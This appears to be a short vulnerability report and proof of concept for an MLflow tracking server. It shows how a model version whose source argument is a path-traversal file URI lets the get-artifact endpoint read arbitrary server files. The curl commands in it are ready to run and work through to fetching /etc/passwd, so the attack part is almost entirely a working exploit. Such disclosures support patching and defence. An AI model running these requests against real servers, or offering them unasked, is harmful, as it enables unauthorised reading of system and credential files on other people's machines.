By creating a model version through the REST API endpoint api/2.0/mlflow/registered-models/create
and specifying a relative path redirection to the source
argument, local server files can be accessed on the tracking server when a subsequent REST API v1.1 call is made to
model-versions/get-artifact` and providing any path on the local file system.
Start an Mlflow server in default mode
mlflow server
Use the REST API to create a model
curl -X POST http://mlflowserver:5000/api/2.0/mlflow/registered-models/create -H "Content-type: application/json" -d '{"name": "AModel"}'
Use the REST API to create a model version by setting the source
argument to a relative path (such as root) on the local file system
(note that this is not restricted to a uri scheme of ‘file://’ only. This also works with ‘http://’, ‘https://’, ‘runs:/’, ‘mlflow-artifacts:/’ and object store locations, provided that the host is not ‘localhost’ or ‘127.0.0.1’).
curl -X POST http://mlflowserver:5000/api/2.0/mlflow/model-versions/create -H "Content-type: application/json" -d '{"name": "AModel", "source": file://hostname/../../../../../../../}'
Retrieve the artifacts from the tracking server’s local filesystem
curl http://mlflowserver:5000/model-versions/get-artifact?path=etc/passwd&name=TestModel&version=1
This will return the file contents of the local password file.